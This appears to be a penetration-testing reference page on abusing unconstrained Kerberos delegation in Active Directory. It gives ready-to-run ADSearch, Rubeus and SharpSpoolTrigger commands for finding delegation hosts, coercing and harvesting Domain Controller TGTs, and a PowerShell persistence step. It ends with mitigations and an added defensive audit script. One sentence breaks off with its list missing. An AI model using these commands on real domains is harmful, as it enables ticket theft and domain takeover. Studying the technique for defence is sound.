Unconstrained Delegation

Table of contents

  1. Vulnerability
  2. Prerequisites
  3. Exploit
  4. Persistence
  5. Recommendations

Vulnerability

Unconstrained delegation allows a machine to act on behalf of any user for any service. If you compromise a machine that can perform unconstrained delegation, you can leverage this feature to escalate your privileges.

Unconstrained delegation only works with Kerberos authentication.

Prerequisites

  • Having compromised a domain-joined computer with unconstrained delegation allowed.

Exploit

# Look for vulnerable domain computers.
./ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname

# From your target (a Domain Controller, if possible), initiate any interaction with the server trusted for delegation that involves Kerberos authentication.
dir \\$CompromisedServerVulnerableToUnconstrainedDelegation\C$

# On the compromised domain computer, list Kerberos TGTs.
./Rubeus.exe triage

# Extract TGTs you want to abuse.
./Rubeus.exe dump /luid:$LUID

Another way to perform this attack is to force your target (let’s say a Domain Controller) to authenticate on the server you compromised. To do so, you can use SharpSpoolTrigger. It will force the authentication and you could therefore capture the Kerberos TGT with Rubeus.

# Capture Kerberos tickets every 10 seconds on the computer you compromised.
./Rubeus.exe monitor /interval:10 /nowrap

# Listener is the host on which you are monitoring Kerberos tickets with Rubeus.
./SharpSpoolTrigger.exe $TargetFQDN $ListenerFQDN

Depending on the nature of the TGTs, perform either:

Persistence

Allowing delegation for a domain computer requires SeEnableDelegationPrivilege, which is by default granted to Domain Admins and Enterprise Admins only. If you are a Domain Admin, you can grant this privilege to any user, or enable delegation for any computer.

# Enable unconstrained delegation for a domain-joined computer.
$Computer = Get-ADComputer -Identity "$ComputerName"
$Computer.TrustedForDelegation = $True
Set-ADComputer -Instance $Computer

Recommendations

  • Avoid using unconstrained delegation; use constrained delegation or resource-based constrained delegation instead.
  • Enforce “Account is sensitive and cannot be delegated” for privileged domain users.
  • Limit the services on which privileged domain users can authenticate, to avoid caching their Kerberos tickets on those hosts.
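The following PowerShell audit script is an added example (not part of the original page) that turns the Persistence and Recommendations sections into something a defender can run: it reports non-DC computers that currently have the TrustedForDelegation bit set (the same userAccountControl value the ADSearch filter above matches), lists members of privileged groups whose accounts can still be delegated, and enforces the “Account is sensitive and cannot be delegated” flag on them. It assumes the ActiveDirectory RSAT module is installed and the caller has read access to the domain; the group list and the function names are hypothetical and can be adapted.

```powershell
# Added audit example, not code from the original page.
# Assumes the ActiveDirectory module (RSAT) and read access to the domain.
Import-Module ActiveDirectory

# userAccountControl bit values (documented flags, not page-specific).
$TRUSTED_FOR_DELEGATION = 0x80000   # 524288, same value as in the LDAP filter above
$NOT_DELEGATED          = 0x100000  # 1048576, "Account is sensitive and cannot be delegated"

function Get-UnconstrainedDelegationComputer {
    # Same LDAP filter as the ADSearch query on this page, via the AD module.
    # Domain Controllers are trusted for delegation by design and are excluded
    # so that only unexpected hosts are reported.
    $dcs = (Get-ADDomainController -Filter *).Name
    $filter = "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=$TRUSTED_FOR_DELEGATION))"
    Get-ADComputer -LDAPFilter $filter -Properties TrustedForDelegation, DNSHostName |
        Where-Object { $dcs -notcontains $_.Name } |
        Select-Object Name, DNSHostName, TrustedForDelegation
}

function Get-DelegatablePrivilegedUser {
    # Members of privileged groups (hypothetical default list) whose accounts
    # lack the NOT_DELEGATED flag, i.e. whose TGTs could be cached and reused
    # on a host trusted for unconstrained delegation.
    param([string[]]$PrivilegedGroups = @('Domain Admins', 'Enterprise Admins'))
    foreach ($g in $PrivilegedGroups) {
        Get-ADGroupMember -Identity $g -Recursive |
            Where-Object { $_.objectClass -eq 'user' } |
            Get-ADUser -Properties userAccountControl, AccountNotDelegated |
            Where-Object { ($_.userAccountControl -band $NOT_DELEGATED) -eq 0 } |
            Select-Object SamAccountName, @{ n = 'Group'; e = { $g } }
    }
}

function Set-PrivilegedUserNotDelegated {
    # Enforce "Account is sensitive and cannot be delegated" on the given accounts.
    # Run with -WhatIf first to review the change before applying it.
    param(
        [Parameter(Mandatory)][string[]]$SamAccountName,
        [switch]$WhatIf
    )
    foreach ($sam in $SamAccountName) {
        Set-ADUser -Identity $sam -AccountNotDelegated $true -WhatIf:$WhatIf
    }
}

# Usage: report, review, then remediate.
Get-UnconstrainedDelegationComputer | Format-Table -AutoSize
$exposed = @(Get-DelegatablePrivilegedUser)
$exposed | Format-Table -AutoSize
if ($exposed.Count -gt 0) {
    # Remove -WhatIf once the list has been reviewed.
    Set-PrivilegedUserNotDelegated -SamAccountName $exposed.SamAccountName -WhatIf
}
```

The computer report is the control for the Persistence section: any non-DC host that appears in it, or that appears between two runs, is either an approved exception or a TrustedForDelegation change worth investigating. The user report and the `Set-ADUser -AccountNotDelegated $true` call implement the second recommendation; the flag causes the KDC to stop issuing forwardable tickets for those accounts, so a compromised host trusted for delegation no longer receives a reusable TGT when they connect to it.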